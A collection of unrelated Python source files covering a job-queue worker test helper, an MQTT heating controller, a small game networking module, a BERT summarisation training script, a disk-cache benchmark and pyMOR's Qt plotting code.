imminent_shutdown_delay = _imminent_shutdown_delay
def perform_job(self, job, queue):
create_file(os.path.join(sandbox, 'started'))
# have to loop here rather than one sleep to avoid holding the GIL
# and preventing signals being received
for i in range(20):
time.sleep(0.1)
create_file(os.path.join(sandbox, 'finished'))
w = TestHerokuWorker(Queue('dummy'))
w.main_work_horse(None, None)
class DummyQueue(object):
pass
def kill_worker(pid, double_kill, interval=0.5):
# wait for the worker to be started over on the main process
time.sleep(interval)
os.kill(pid, signal.SIGTERM)
if double_kill:
# give the worker time to switch signal handler
time.sleep(interval)
os.kill(pid, signal.SIGTERM)
class Serializer(object):
def loads(self): pass
def dumps(self): pass
def start_worker(queue_name, conn_kwargs, worker_name, burst):
"""
Start a worker. We accept only serializable args, so that this can be
executed via multiprocessing.
"""
# Silence stdout (thanks to <https://stackoverflow.com/a/28321717/14153673>)
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stdout(devnull):
w = Worker([queue_name], name=worker_name, connection=Redis(**conn_kwargs))
w.work(burst=burst)
def start_worker_process(queue_name, connection=None, worker_name=None, burst=False):
"""
Use multiprocessing to start a new worker in a separate process.
"""
connection = connection or get_current_connection()
conn_kwargs = connection.connection_pool.connection_kwargs
p = Process(target=start_worker, args=(queue_name, conn_kwargs, worker_name, burst))
p.start()
return p
def burst_two_workers(queue, timeout=2, tries=5, pause=0.1):
"""
Get two workers working simultaneously in burst mode, on a given queue.
Return after both workers have finished handling jobs, up to a fixed timeout
on the worker that runs in another process.
"""
w1 = start_worker_process(queue.name, worker_name='w1', burst=True)
w2 = Worker(queue, name='w2')
jobs = queue.jobs
if jobs:
first_job = jobs[0]
# Give the first worker process time to get started on the first job.
# This is helpful in tests where we want to control which worker takes which job.
n = 0
while n < tries and not first_job.is_started:
time.sleep(pause)
n += 1
# Now can start the second worker.
w2.work(burst=True)
w1.join(timeout)
|
ECS_manager.py
|
from time import sleep
from threading import Thread
import paho.mqtt.client as mqtt
MQTT_ADDRESS = "localhost"
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc) + "\n")
def on_message(client, userdata, msg):
print(msg.topic+" "+str(msg.payload) + "\n")
def ecsMqttMonitor():
mqttClient = mqtt.Client()
mqttClient.on_connect = on_connect
mqttClient.on_message = on_message
mqttClient.connect(MQTT_ADDRESS)
mqttClient.subscribe("ECS/temp")
mqttClient.loop_forever()
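# Note (hedged): loop_forever() blocks the calling thread, which is why
# ecsMqttMonitor is started on its own Thread below; heatMgr instead uses
# loop_start(), which runs the paho-mqtt network loop in a background thread
# and returns immediately.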
def calendarMonitor():
while True:
print "second thread"
sleep(1)
def heatMgr():
mqttClient = mqtt.Client()
mqttClient.on_connect = on_connect
mqttClient.on_message = on_message
mqttClient.connect(MQTT_ADDRESS)
mqttClient.loop_start()
t = Thread(target=ecsMqttMonitor, args=())
t.start()
t2 = Thread(target=calendarMonitor, args=())
t2.start()
t3 = Thread(target=heatMgr, args=())
t3.start()
|
Network.py
|
import asyncore
import threading
from network.ntypes import AsyncServer, AsyncClient
def calc_time(since, until):
"""
simple function to calculate time passage
:param since: the start of the moment
:type since: time.struct_time
:param until: the end of the moment
:type until: time.struct_time
:return: the length of the calculated moment in seconds
:rtype: int or long
"""
years = until[0] - since[0]
months = until[1] - since[1]
days = until[2] - since[2]
hours = until[3] - since[3]
minutes = until[4] - since[4]
seconds = until[5] - since[5]
    # Approximate a month as 30 days and a year as 365 days.
    result = seconds + minutes * 60 + hours * 3600 + days * 86400 + months * 2592000 + years * 31536000
return result
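# Hedged worked example (illustrative dates): from 2020-01-01 00:00:00 to
# 2020-01-02 01:30:05 the field deltas are 0 years, 0 months, 1 day, 1 hour,
# 30 minutes and 5 seconds, i.e. 5 + 30*60 + 1*3600 + 1*86400 = 91805 seconds.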
def data_thread(queue):
"""
deprecated
simple thread for interactive input
:param queue: the object for transferring the data to the network thread
:type queue: list
"""
message = ''
while not message.lower() == 'exit':
        message = raw_input("Enter message:\n")
queue.append(message)
def net_thread(name, host, port, instream, outstream):
"""
simple thread for communicating with the server
:param name: name of the player
:type name: str
:param host: the IP(v4) address of the server
:type host: str
:param port: the port on which the server is listening
:type port: int
:param instream: object collecting the data to send to the server
:type instream: list
:param outstream: object for distributing the data collected from the server
:type outstream: list
"""
play = AsyncClient(name, host, port, instream, outstream)
asyncore.loop()
def server():
"""
thread function to run the server
"""
# current maximum of players per game
# possible change: operator determine the number of players
MAX_PLAYERS = 2
serv = AsyncServer(MAX_PLAYERS)
# basic show of server location
print serv.address
asyncore.loop()
def player(name, address, port):
"""
deprecated
simple thread for checking server stability
:param name: name of the user
:type name: str
:param address: the IP(v4) of the server
:type address: str
:param port: the port on which the server is listening
:type port: int
"""
stream = []
net = threading.Thread(target=net_thread, args=(name, address, port, stream, stream))
data = threading.Thread(target=data_thread, args=(stream,))
net.start()
data.start()
net.join()
data.join()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from transformers import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
        except (IndexError, ValueError):
step = 0
test(args, device_id, cp, step)
|
benchmark_incr.py
|
"""Benchmark cache.incr method.
"""
from __future__ import print_function
import json
import multiprocessing as mp
import shutil
import time
import diskcache as dc
from .utils import secs
COUNT = int(1e3)
PROCS = 8
def worker(num):
"Rapidly increment key and time operation."
time.sleep(0.1) # Let other workers start.
cache = dc.Cache('tmp')
values = []
for _ in range(COUNT):
start = time.time()
cache.incr(b'key')
end = time.time()
values.append(end - start)
with open('output-%s.json' % num, 'w') as writer:
json.dump(values, writer)
def main():
"Run workers and print percentile results."
shutil.rmtree('tmp', ignore_errors=True)
processes = [
mp.Process(target=worker, args=(num,)) for num in range(PROCS)
]
for process in processes:
process.start()
for process in processes:
process.join()
with dc.Cache('tmp') as cache:
assert cache.get(b'key') == COUNT * PROCS
for num in range(PROCS):
values = []
with open('output-%s.json' % num) as reader:
values += json.load(reader)
values.sort()
p50 = int(len(values) * 0.50) - 1
p90 = int(len(values) * 0.90) - 1
p99 = int(len(values) * 0.99) - 1
p00 = len(values) - 1
print(['{0:9s}'.format(val) for val in 'p50 p90 p99 max'.split()])
print([secs(values[pos]) for pos in [p50, p90, p99, p00]])
if __name__ == '__main__':
main()
|
qt.py
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
#
# Contributors: Andreas Buhr <andreas@andreasbuhr.de>
# Michael Schaefer <michael.schaefer@uni-muenster.de>
""" This module provides a few methods and classes for visualizing data
associated to grids. We use the `PySide <http://www.pyside.org>`_ bindings
for the `Qt <http://www.qt-project.org>`_ widget toolkit for the GUI.
"""
from __future__ import absolute_import, division, print_function
from itertools import izip
import math as m
import numpy as np
try:
from PySide.QtGui import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QSlider, QApplication, QLCDNumber,
QAction, QStyle, QToolBar, QLabel, QFileDialog, QMessageBox)
from PySide.QtCore import Qt, QCoreApplication, QTimer
HAVE_PYSIDE = True
except ImportError:
HAVE_PYSIDE = False
import multiprocessing
import os
import signal
import time
from pymor.core.defaults import defaults
from pymor.core.interfaces import BasicInterface
from pymor.core.logger import getLogger
from pymor.grids.oned import OnedGrid
from pymor.grids.rect import RectGrid
from pymor.grids.tria import TriaGrid
from pymor.gui.gl import GLPatchWidget, ColorBarWidget, HAVE_GL
from pymor.gui.matplotlib import Matplotlib1DWidget, MatplotlibPatchWidget, HAVE_MATPLOTLIB
from pymor.tools.vtkio import HAVE_PYVTK, write_vtk
from pymor.vectorarrays.interfaces import VectorArrayInterface
from pymor.vectorarrays.numpy import NumpyVectorArray
if HAVE_PYSIDE:
class PlotMainWindow(QWidget):
"""Base class for plot main windows."""
def __init__(self, U, plot, length=1, title=None):
super(PlotMainWindow, self).__init__()
layout = QVBoxLayout()
if title:
title = QLabel('<b>' + title + '</b>')
title.setAlignment(Qt.AlignHCenter)
layout.addWidget(title)
layout.addWidget(plot)
plot.set(U, 0)
if length > 1:
hlayout = QHBoxLayout()
self.slider = QSlider(Qt.Horizontal)
self.slider.setMinimum(0)
self.slider.setMaximum(length - 1)
self.slider.setTickPosition(QSlider.TicksBelow)
hlayout.addWidget(self.slider)
lcd = QLCDNumber(m.ceil(m.log10(length)))
lcd.setDecMode()
lcd.setSegmentStyle(QLCDNumber.Flat)
hlayout.addWidget(lcd)
layout.addLayout(hlayout)
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_play = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), 'Play', self)
self.a_play.setCheckable(True)
self.a_rewind = QAction(self.style().standardIcon(QStyle.SP_MediaSeekBackward), 'Rewind', self)
self.a_toend = QAction(self.style().standardIcon(QStyle.SP_MediaSeekForward), 'End', self)
self.a_step_backward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipBackward),
'Step Back', self)
self.a_step_forward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipForward), 'Step', self)
self.a_loop = QAction(self.style().standardIcon(QStyle.SP_BrowserReload), 'Loop', self)
self.a_loop.setCheckable(True)
toolbar.addAction(self.a_play)
toolbar.addAction(self.a_rewind)
toolbar.addAction(self.a_toend)
toolbar.addAction(self.a_step_backward)
toolbar.addAction(self.a_step_forward)
toolbar.addAction(self.a_loop)
if hasattr(self, 'save'):
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
self.a_save.triggered.connect(self.save)
hlayout.addWidget(toolbar)
self.speed = QSlider(Qt.Horizontal)
self.speed.setMinimum(0)
self.speed.setMaximum(100)
hlayout.addWidget(QLabel('Speed:'))
hlayout.addWidget(self.speed)
layout.addLayout(hlayout)
self.timer = QTimer()
self.timer.timeout.connect(self.update_solution)
self.slider.valueChanged.connect(self.slider_changed)
self.slider.valueChanged.connect(lcd.display)
self.speed.valueChanged.connect(self.speed_changed)
self.a_play.toggled.connect(self.toggle_play)
self.a_rewind.triggered.connect(self.rewind)
self.a_toend.triggered.connect(self.to_end)
self.a_step_forward.triggered.connect(self.step_forward)
self.a_step_backward.triggered.connect(self.step_backward)
self.speed.setValue(50)
elif hasattr(self, 'save'):
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
hlayout.addWidget(toolbar)
layout.addLayout(hlayout)
self.a_save.triggered.connect(self.save)
self.setLayout(layout)
self.plot = plot
self.U = U
self.length = length
def slider_changed(self, ind):
self.plot.set(self.U, ind)
def speed_changed(self, val):
self.timer.setInterval(val * 20)
def update_solution(self):
ind = self.slider.value() + 1
if ind >= self.length:
if self.a_loop.isChecked():
ind = 0
else:
self.a_play.setChecked(False)
return
self.slider.setValue(ind)
def toggle_play(self, checked):
if checked:
if self.slider.value() + 1 == self.length:
self.slider.setValue(0)
self.timer.start()
else:
self.timer.stop()
def rewind(self):
self.slider.setValue(0)
def to_end(self):
self.a_play.setChecked(False)
self.slider.setValue(self.length - 1)
def step_forward(self):
self.a_play.setChecked(False)
ind = self.slider.value() + 1
if ind == self.length and self.a_loop.isChecked():
ind = 0
if ind < self.length:
self.slider.setValue(ind)
def step_backward(self):
self.a_play.setChecked(False)
ind = self.slider.value() - 1
if ind == -1 and self.a_loop.isChecked():
ind = self.length - 1
if ind >= 0:
self.slider.setValue(ind)
_launch_qt_app_pids = set()
def _launch_qt_app(main_window_factory, block):
"""Wrapper to display plot in a separate process."""
def doit():
try:
app = QApplication([])
except RuntimeError:
app = QCoreApplication.instance()
main_window = main_window_factory()
main_window.show()
app.exec_()
if block:
doit()
else:
p = multiprocessing.Process(target=doit)
p.start()
_launch_qt_app_pids.add(p.pid)
if block:
p.join()
def stop_gui_processes():
for p in multiprocessing.active_children():
if p.pid in _launch_qt_app_pids:
p.terminate()
waited = 0
while any(p.pid in _launch_qt_app_pids for p in multiprocessing.active_children()):
time.sleep(1)
waited += 1
if waited == 5:
break
for p in multiprocessing.active_children():
if p.pid in _launch_qt_app_pids:
try:
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
@defaults('backend', sid_ignore=('backend',))
def visualize_patch(grid, U, bounding_box=([0, 0], [1, 1]), codim=2, title=None, legend=None,
separate_colorbars=False, rescale_colorbars=False, backend='gl', block=False, columns=2):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True`, block execution until the plot window is closed.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
if not HAVE_PYSIDE:
raise ImportError('cannot visualize: import of PySide failed')
assert backend in {'gl', 'matplotlib'}
if backend == 'gl':
if not HAVE_GL:
raise ImportError('cannot visualize: import of PyOpenGL failed')
else:
if not HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
# TODO extract class
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, bounding_box, codim, title, legend, separate_colorbars, rescale_colorbars, backend):
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.data,) if hasattr(U, 'data') else tuple(u.data for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
if backend == 'gl':
widget = GLPatchWidget
else:
widget = MatplotlibPatchWidget
if not separate_colorbars and len(U) > 1:
l = getLogger('pymor.gui.qt.visualize_patch')
l.warn('separate_colorbars=False not supported for matplotlib backend')
separate_colorbars = True
class PlotWidget(QWidget):
def __init__(self):
super(PlotWidget, self).__init__()
if separate_colorbars:
if rescale_colorbars:
self.vmins = tuple(np.min(u[0]) for u in U)
self.vmaxs = tuple(np.max(u[0]) for u in U)
else:
self.vmins = tuple(np.min(u) for u in U)
self.vmaxs = tuple(np.max(u) for u in U)
else:
if rescale_colorbars:
self.vmins = (min(np.min(u[0]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[0]) for u in U),) * len(U)
else:
self.vmins = (min(np.min(u) for u in U),) * len(U)
self.vmaxs = (max(np.max(u) for u in U),) * len(U)
layout = QHBoxLayout()
plot_layout = QGridLayout()
self.colorbarwidgets = [ColorBarWidget(self, vmin=vmin, vmax=vmax)
for vmin, vmax in izip(self.vmins, self.vmaxs)]
plots = [widget(self, grid, vmin=vmin, vmax=vmax, bounding_box=bounding_box, codim=codim)
for vmin, vmax in izip(self.vmins, self.vmaxs)]
if legend:
for i, plot, colorbar, l in izip(xrange(len(plots)), plots, self.colorbarwidgets, legend):
subplot_layout = QVBoxLayout()
caption = QLabel(l)
caption.setAlignment(Qt.AlignHCenter)
subplot_layout.addWidget(caption)
if not separate_colorbars or backend == 'matplotlib':
subplot_layout.addWidget(plot)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
hlayout.addWidget(colorbar)
subplot_layout.addLayout(hlayout)
plot_layout.addLayout(subplot_layout, int(i/columns), (i % columns), 1, 1)
else:
for i, plot, colorbar in izip(xrange(len(plots)), plots, self.colorbarwidgets):
if not separate_colorbars or backend == 'matplotlib':
plot_layout.addWidget(plot, int(i/columns), (i % columns), 1, 1)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
hlayout.addWidget(colorbar)
plot_layout.addLayout(hlayout, int(i/columns), (i % columns), 1, 1)
layout.addLayout(plot_layout)
if not separate_colorbars:
layout.addWidget(self.colorbarwidgets[0])
for w in self.colorbarwidgets[1:]:
w.setVisible(False)
self.setLayout(layout)
self.plots = plots
def set(self, U, ind):
if rescale_colorbars:
if separate_colorbars:
self.vmins = tuple(np.min(u[ind]) for u in U)
self.vmaxs = tuple(np.max(u[ind]) for u in U)
else:
self.vmins = (min(np.min(u[ind]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[ind]) for u in U),) * len(U)
for u, plot, colorbar, vmin, vmax in izip(U, self.plots, self.colorbarwidgets, self.vmins,
self.vmaxs):
plot.set(u[ind], vmin=vmin, vmax=vmax)
colorbar.set(vmin=vmin, vmax=vmax)
super(MainWindow, self).__init__(U, PlotWidget(), title=title, length=len(U[0]))
self.grid = grid
self.codim = codim
def save(self):
if not HAVE_PYVTK:
                msg = QMessageBox(QMessageBox.Critical, 'Error', 'VTK output disabled. Please install pyvtk.')
msg.exec_()
return
filename = QFileDialog.getSaveFileName(self, 'Save as vtk file')[0]
base_name = filename.split('.vtu')[0].split('.vtk')[0].split('.pvd')[0]
if base_name:
if len(self.U) == 1:
write_vtk(self.grid, NumpyVectorArray(self.U[0], copy=False), base_name, codim=self.codim)
else:
for i, u in enumerate(self.U):
write_vtk(self.grid, NumpyVectorArray(u, copy=False), '{}-{}'.format(base_name, i),
codim=self.codim)
_launch_qt_app(lambda: MainWindow(grid, U, bounding_box, codim, title=title, legend=legend,
separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=backend),
block)
def visualize_matplotlib_1d(grid, U, codim=1, title=None, legend=None, separate_plots=False, block=False):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_plots
If `True`, use subplots to visualize multiple |VectorArrays|.
block
If `True`, block execution until the plot window is closed.
"""
if not HAVE_PYSIDE:
raise ImportError('cannot visualize: import of PySide failed')
if not HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, codim, title, legend, separate_plots):
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.data,) if hasattr(U, 'data') else tuple(u.data for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
plot_widget = Matplotlib1DWidget(None, grid, count=len(U), vmin=[np.min(u) for u in U],
vmax=[np.max(u) for u in U], legend=legend, codim=codim,
separate_plots=separate_plots)
super(MainWindow, self).__init__(U, plot_widget, title=title, length=len(U[0]))
self.grid = grid
_launch_qt_app(lambda: MainWindow(grid, U, codim, title=title, legend=legend, separate_plots=separate_plots), block)
class PatchVisualizer(BasicInterface):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True` block execution until the plot window is closed.
"""
def __init__(self, grid, bounding_box=([0, 0], [1, 1]), codim=2, backend=None, block=False):
assert isinstance(grid, (RectGrid, TriaGrid))
assert codim in (0, 2)
self.grid = grid
self.bounding_box = bounding_box
self.codim = codim
self.backend = backend
self.block = block
def visualize(self, U, discretization, title=None, legend=None, separate_colorbars=False,
rescale_colorbars=False, block=None, filename=None, columns=2):
"""Visualize the provided data.
Parameters
----------
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
